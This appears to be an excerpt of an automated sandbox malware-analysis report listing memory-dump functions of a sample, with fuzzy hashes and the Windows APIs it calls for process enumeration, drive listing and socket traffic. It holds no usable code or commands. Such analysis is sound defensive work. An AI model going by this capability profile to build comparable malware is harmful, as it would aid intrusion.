                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a7683207378dcbdc5e6dce5aa6ac810b30227f28f4a1d24df0101270f4f6cee7
                                                            • Instruction ID: 10f0b0c3a87fe628e3a3c7bb8b2da8e28fb84604ccec91e6bfc8a03316ad36e2
                                                            • Opcode Fuzzy Hash: a7683207378dcbdc5e6dce5aa6ac810b30227f28f4a1d24df0101270f4f6cee7
                                                            • Instruction Fuzzy Hash: A84194EB14C3117DB282A6A17B18FFB6B6EE6D27707319436F503C2542E7980E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ffb8ca4192d198dabb00aa653d576bb773798cea3d9868d8c6ec4abced5f70f5
                                                            • Instruction ID: c10f75730a8b983170b463a45eebebda7742d8b8103e932752ff1429747f7183
                                                            • Opcode Fuzzy Hash: ffb8ca4192d198dabb00aa653d576bb773798cea3d9868d8c6ec4abced5f70f5
                                                            • Instruction Fuzzy Hash: 8C41B4FB14C3217DB282A6A17B18EFB6B6EE6D27707319436F503C6542E7980E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 0c0572f2fbaf00e1fb9ebbd83ccdfa1ca750b9f621de160528b525bb80243b24
                                                            • Instruction ID: a14a72e6ab0ab7b6ada105a45a48ca215635fd80279f3590b5ca6954507e478e
                                                            • Opcode Fuzzy Hash: 0c0572f2fbaf00e1fb9ebbd83ccdfa1ca750b9f621de160528b525bb80243b24
                                                            • Instruction Fuzzy Hash: DC41A5EB14C3117DB282A6A17B18FFB6B6EE6D27707319436F603C2542E7980E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 5c4d90729b22fe9ac58ea54952d9d22b14c833c36315fa9a34af7b8ac0b4ff44
                                                            • Instruction ID: 020c56e6a7f0df39619aae1b6109dcde8d5cab3a92780e35a2c8a1704ada3e87
                                                            • Opcode Fuzzy Hash: 5c4d90729b22fe9ac58ea54952d9d22b14c833c36315fa9a34af7b8ac0b4ff44
                                                            • Instruction Fuzzy Hash: C44185EB14C3117DB282A6617B58FFB6B6EE6D27707319436F503D2542E7880E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: f5a563d36f5bd69042a255936289f6dd692245c86d13295118a5ad882f5dc4d3
                                                            • Instruction ID: 05fa063bd3199163cb46c2fa3289ed9f53197ec46220c2743c65e9ed224b4d92
                                                            • Opcode Fuzzy Hash: f5a563d36f5bd69042a255936289f6dd692245c86d13295118a5ad882f5dc4d3
                                                            • Instruction Fuzzy Hash: 4B41B3EB10C3117DB282A6A17B58FFB6B6EE6D2770731943AF903C1542E3880E4A50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67984387ece1f8283d4c90ec169d8ba1492beda52e6b030119e8ffe02761d547
                                                            • Instruction ID: 8b23fad0a26d0ab76db2b4bb909242ff48050d969414e00c50620648a15880a3
                                                            • Opcode Fuzzy Hash: 67984387ece1f8283d4c90ec169d8ba1492beda52e6b030119e8ffe02761d547
                                                            • Instruction Fuzzy Hash: 954181EB14C3217DB282A2A17B58FFB6B6EE6D2770731A436F507D1542E2880E4A50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 4cbbdeebc8ffd55a7e341c892ab551858fac9e6f378b920fb9a66d7fa25d65d5
                                                            • Instruction ID: 9aa74ac6b5644ea2740d3044a73605e197e7ac134fca15e50db8eb861ec49402
                                                            • Opcode Fuzzy Hash: 4cbbdeebc8ffd55a7e341c892ab551858fac9e6f378b920fb9a66d7fa25d65d5
                                                            • Instruction Fuzzy Hash: 8E418FEB14C3217DB282A2A17B58FFB6B6EE6D2770731943AF503C5542E2880E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d4ffbd664acc66c9e826faf6f9bb47972930269079b761003f3a70b857c0df7
                                                            • Instruction ID: 179a41e8c7c098a608ab48bd95f53d00b71d90a40cc878f2ab201bd30c2f8285
                                                            • Opcode Fuzzy Hash: 2d4ffbd664acc66c9e826faf6f9bb47972930269079b761003f3a70b857c0df7
                                                            • Instruction Fuzzy Hash: 4F4183EB14C3217DB282A2A13F58FFB6B6EE6D27707319436F503C5542E2880E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 14a3dc3b63b02a0a7ad715b8fa2447f844bfe51ec04cc7563d123daaabe28828
                                                            • Instruction ID: 514433c65d340c6cd6354c4489a70091ac5ad4371965f4b1acfa747dc04a4e66
                                                            • Opcode Fuzzy Hash: 14a3dc3b63b02a0a7ad715b8fa2447f844bfe51ec04cc7563d123daaabe28828
                                                            • Instruction Fuzzy Hash: E54161EB14C2217DB282A6A17F58FFB6B6EE6D27707319436F503D5542E2880F4E10B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 57fa9bd90f1079f9a599efe25ea2e08954628e6cc6922b16ea624603e21d6cbb
                                                            • Instruction ID: 2898ebe77eb7acd262cf227b62f975cd894e4f55c9125e60ff9525eb54bc3597
                                                            • Opcode Fuzzy Hash: 57fa9bd90f1079f9a599efe25ea2e08954628e6cc6922b16ea624603e21d6cbb
                                                            • Instruction Fuzzy Hash: 503150EB14C2217DB282A6A17F58FFB6B6EE6D2770731A436F507D5542E2880E4E10B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: d08c094738e6c093b57aba50160da61f8f002c10acbbf63cd8b57dca693786e6
                                                            • Instruction ID: aa655449cfc8a58ddf4c3168733e0f2049cd274033b06cfaa6088b42e195590d
                                                            • Opcode Fuzzy Hash: d08c094738e6c093b57aba50160da61f8f002c10acbbf63cd8b57dca693786e6
                                                            • Instruction Fuzzy Hash: 0A3182EB14C2217DB282A6A17F58FFB6B6EE6D27707319436F503D1542E3880E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 342244f317da9724519d714e00a10461091ed292a24fafd6dc79a834c0236c19
                                                            • Instruction ID: 5aac26c0b565bcefd4d02e51c86d98a2226f2b5fe8a042344db777bbf65ec73c
                                                            • Opcode Fuzzy Hash: 342244f317da9724519d714e00a10461091ed292a24fafd6dc79a834c0236c19
                                                            • Instruction Fuzzy Hash: B231D6EB14C3107DB282A6A17B58FFA6B6EE6D2770731943AF503C5502E3880E4E51B1
                                                            APIs
                                                            • gethostname.WS2_32(00000000,00000040), ref: 01044AA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: gethostname
                                                            • String ID:
                                                            • API String ID: 144339138-0
                                                            • Opcode ID: 7c9484a6e5b82ad3a797b0675a9887948e42f7d1316c600adfefdb963751ce58
                                                            • Instruction ID: 7539d5c9264141afe97b579048fd40221978370177da74e9537ccd15352d5513
                                                            • Opcode Fuzzy Hash: 7c9484a6e5b82ad3a797b0675a9887948e42f7d1316c600adfefdb963751ce58
                                                            • Instruction Fuzzy Hash: F251DFF46003018BFB719A29DDC87277AD4AF01319F0408BCDACAC66D1E7B4E884DB52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 7f2d2a458eafe206a4f3c1ea0d025a12af43e8be9132e386bf1583fd4a2e29a1
                                                            • Instruction ID: 677ccde74355a93a5e56aabdb47f5b29dca5305d4109f10567b34fb45bc3860a
                                                            • Opcode Fuzzy Hash: 7f2d2a458eafe206a4f3c1ea0d025a12af43e8be9132e386bf1583fd4a2e29a1
                                                            • Instruction Fuzzy Hash: CC2194EB14C3217DB2C2A2A17B58BFA6B6EE6D2770731E436F503D5542E3884E4A10B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 52f495c8ad6d286a4f9fb04a7b280fbd17e2dc1e0a3e247a20f71a780e95cfc2
                                                            • Instruction ID: 40efd857f42aa0f2fffb98936fd115bdf48056e96626da4a2571b6395de0276e
                                                            • Opcode Fuzzy Hash: 52f495c8ad6d286a4f9fb04a7b280fbd17e2dc1e0a3e247a20f71a780e95cfc2
                                                            • Instruction Fuzzy Hash: BD21A6EB14C3117DB2C2A6A17B58BFA6B6EE6E6770731E537F503D1541E2880E4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 061af963433f4dde933a91a3d2e4ae0eb9a43feb166d683c91a38402ba9756f7
                                                            • Instruction ID: f331747c63866c435f0eb68ff9344d9732e19b2c53309e6a32698f15340bba25
                                                            • Opcode Fuzzy Hash: 061af963433f4dde933a91a3d2e4ae0eb9a43feb166d683c91a38402ba9756f7
                                                            • Instruction Fuzzy Hash: 1F21C2EB14C3117D72C2B2B17B58BFA6A6EE6E33B0731A436F603D1541E2880E4B10B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,06E40026), ref: 06E40487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 929926605f0d6eaec021cc58ba9f0ce57ab3d7399947aa14345b9f0729ed0e19
                                                            • Instruction ID: a59938a8142012f3676032f544135bc79b4a0e458aee8c4d5301fb5f2aa2f935
                                                            • Opcode Fuzzy Hash: 929926605f0d6eaec021cc58ba9f0ce57ab3d7399947aa14345b9f0729ed0e19
                                                            • Instruction Fuzzy Hash: F22124EA14C3513DB382B3B17A596F57E5EE6E72B0331A536E643C5102E2880E4B51B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 1b4c567195d0124328b88f68e3a697556cc928ed1a67a8ae20d17a11cbf8fe0d
                                                            • Instruction ID: 63458b5d4aa2acd3b2fed4cc95e96a52a1e07eaf773ae83875c8f09aacc15dc2
                                                            • Opcode Fuzzy Hash: 1b4c567195d0124328b88f68e3a697556cc928ed1a67a8ae20d17a11cbf8fe0d
                                                            • Instruction Fuzzy Hash: D311E9DA14C3113DB3D6A6B07A186F66A5EE3E32B0732A536B543D5541E2894F4B10F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 6c52f3174018f5061aaec9e8fb1e51d8987e3e2bf0fec02497a6ef0adef308a5
                                                            • Instruction ID: 8584056c43c4a49575b640aabc32c123f556fc5c4bc95805c767aee9ffb11f66
                                                            • Opcode Fuzzy Hash: 6c52f3174018f5061aaec9e8fb1e51d8987e3e2bf0fec02497a6ef0adef308a5
                                                            • Instruction Fuzzy Hash: E61129DA24C3113DB282B670BE18BF66A6ED2E22B0731A532F542D5441E2884E4B40F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ca3f5d259a12c7e526670f953e3e1d13596609d15db4823570005d1de75a2d92
                                                            • Instruction ID: 17f8b676b4485616fec2a4f57e329db596e69c39d41681d673cebab7c3a66ee1
                                                            • Opcode Fuzzy Hash: ca3f5d259a12c7e526670f953e3e1d13596609d15db4823570005d1de75a2d92
                                                            • Instruction Fuzzy Hash: FC0188DA14C3117DB286B6B17B18AF6662ED6E32B1731A536F603D5541E2884E4B10F1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,06E40026), ref: 06E40487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: c2a8c8fc3dd26352668ef6a28e5bf3fa6d81eeaffcfbce5175612519fe69610c
                                                            • Instruction ID: 04fc2ca4c7d8e08ea95146a9bdf11d63cce33b83191a7df0d00bde515a39469d
                                                            • Opcode Fuzzy Hash: c2a8c8fc3dd26352668ef6a28e5bf3fa6d81eeaffcfbce5175612519fe69610c
                                                            • Instruction Fuzzy Hash: 47018FEA14C2117DB292A2A17F18BF6662EE2E33B0731A532F603D5581E2884E4B10B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,06E40026), ref: 06E40487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 8f5230c5f820b8575a373a5ae90bdd4ffd3057a82a8b52ac663120507e523616
                                                            • Instruction ID: 3cc33816395d25954bb9c302c9ab75789cee2cd24ff25fa3d3ce77b5c062fe31
                                                            • Opcode Fuzzy Hash: 8f5230c5f820b8575a373a5ae90bdd4ffd3057a82a8b52ac663120507e523616
                                                            • Instruction Fuzzy Hash: F90128AA24C3103DF392A6B17B08BFA662DE6D36717319436F503C1442E2884A4F10F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: 55e2523bf4338a48043932cf938ef43e339a9f53e567f53b0afba940db16afaf
                                                            • Instruction ID: e235d84e9ed2df7796889a3398c67e289b2b460e4818b1b18c65d1b55042d0cd
                                                            • Opcode Fuzzy Hash: 55e2523bf4338a48043932cf938ef43e339a9f53e567f53b0afba940db16afaf
                                                            • Instruction Fuzzy Hash: CC114C9690C351AFF78389E04588FFA3F69E95F1703346466E142C9482F5AD0AC787A1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: 814324704ea17565c0717f773c33ed571608de376011df056dc607adf6d355fa
                                                            • Instruction ID: 781130761ef0b6a9e1a4b45dbc57ec00597569c477b538654a7f5ebeff1a64ee
                                                            • Opcode Fuzzy Hash: 814324704ea17565c0717f773c33ed571608de376011df056dc607adf6d355fa
                                                            • Instruction Fuzzy Hash: E0F0C892A0C351BFF7C385910A88FFB7B39BA9E2303205462F103951C1F9A84BC656A1
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 0105AFD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID:
                                                            • API String ID: 3358416759-0
                                                            • Opcode ID: 499d9f57557bc89fa777aba1386099c8827530b0eaf7c6292d45b5d236dd0e1d
                                                            • Instruction ID: 5f8603de02e1e866abb8363da601d9d9c95e96aa6d232cda024cffc9cc9c2f36
                                                            • Opcode Fuzzy Hash: 499d9f57557bc89fa777aba1386099c8827530b0eaf7c6292d45b5d236dd0e1d
                                                            • Instruction Fuzzy Hash: 8E118470908785D5EB668F5CD8027E7B3F4EFC0329F109A18E9D942150F73696C58BD2
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: a7ac1152e4a71cd6be156d85dffd07a52447eff7de64d9b334870440ec4edaaa
                                                            • Instruction ID: 2b8c1a52a0b24cda93a202c4cfbb718ecbcbd3d1620d0fffc0ac65c00b263557
                                                            • Opcode Fuzzy Hash: a7ac1152e4a71cd6be156d85dffd07a52447eff7de64d9b334870440ec4edaaa
                                                            • Instruction Fuzzy Hash: EBF0F6D2A0C345BFB7C385910688FFA2B69B5DE220330A066B1029A581F9A84EC646A1
                                                            APIs
                                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0105A97E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID:
                                                            • API String ID: 2809346765-0
                                                            • Opcode ID: 207faae2d5caf89190804ee59e8d8dd42862da466406eba0f8db356adb04b4e1
                                                            • Instruction ID: bfeb78bd8dbaf3bb538cee970e00128fa1815778c2704ef4d920100214762a5b
                                                            • Opcode Fuzzy Hash: 207faae2d5caf89190804ee59e8d8dd42862da466406eba0f8db356adb04b4e1
                                                            • Instruction Fuzzy Hash: B901A276B01710AFD7548F28DC45B5ABBA5EF84720F068659EAD82B361C331AC108BE1
                                                            APIs
                                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0104712E,?,?,?,00001001,00000000), ref: 0105A90D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: recvfrom
                                                            • String ID:
                                                            • API String ID: 846543921-0
                                                            • Opcode ID: 7617b798a74a77bdd555b5cf34c0ac127c87266604719a39b57b7d4420d021c7
                                                            • Instruction ID: a07d940b015f889b145cdad28982c55f99bfff6b3c8a1b09b4b66b5dd06fbd1d
                                                            • Opcode Fuzzy Hash: 7617b798a74a77bdd555b5cf34c0ac127c87266604719a39b57b7d4420d021c7
                                                            • Instruction Fuzzy Hash: 9BF06D79208318AFE2509E01DC48D6BBBFDFFC9754F05466DFD88232118270AE10CAB2
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,06E40026), ref: 06E40487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 41c24e515e56cfdeb40afa491adfe18524e091f8a1295d9ee3615780ba249ddc
                                                            • Instruction ID: 9685bcdd11ffda4710082e536075f7bab15941fba5410943d2a6d8dfc02dd2a3
                                                            • Opcode Fuzzy Hash: 41c24e515e56cfdeb40afa491adfe18524e091f8a1295d9ee3615780ba249ddc
                                                            • Instruction Fuzzy Hash: E8E022601483016EF3C6FA70EA803FA3546ABE22F2F33A030964282040F6488D0700F0
                                                            APIs
                                                            • socket.WS2_32(?,0105B280,00000000,-00000001,00000000,0105B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0105AF66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID:
                                                            • API String ID: 98920635-0
                                                            • Opcode ID: 0903e91fa78a333a9268546d8943677f11855c4cb3ebb3d3cebf787f25b9ae9a
                                                            • Instruction ID: f3e8a88bca21cd6a1ff434ac0f543989b7ced309d464cc979aeb2d12fb5c123e
                                                            • Opcode Fuzzy Hash: 0903e91fa78a333a9268546d8943677f11855c4cb3ebb3d3cebf787f25b9ae9a
                                                            • Instruction Fuzzy Hash: B4E0EDB2B05221ABD6A49E5CE8449ABF7A9EFC4A20F054B49BD9463204C330AC5087E2
                                                            APIs
                                                            • closesocket.WS2_32(?,01059422,?,?,?,?,?,?,?,?,?,?,?,01043377,01424C60,00000000), ref: 0105B04D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID:
                                                            • API String ID: 2781271927-0
                                                            • Opcode ID: 8840526fa063932d53b86693639995c8d3844470026595a7c9beb5cad40ceb4a
                                                            • Instruction ID: a291445341d808c2c69cbfc407df60dee220ef2d90da33372d5c15df1afdf97f
                                                            • Opcode Fuzzy Hash: 8840526fa063932d53b86693639995c8d3844470026595a7c9beb5cad40ceb4a
                                                            • Instruction Fuzzy Hash: C9D0C23430020157DFA09A18C884A577BAB7FC0210FA8DBA8FAAC4A190D73BE8438601
                                                            APIs
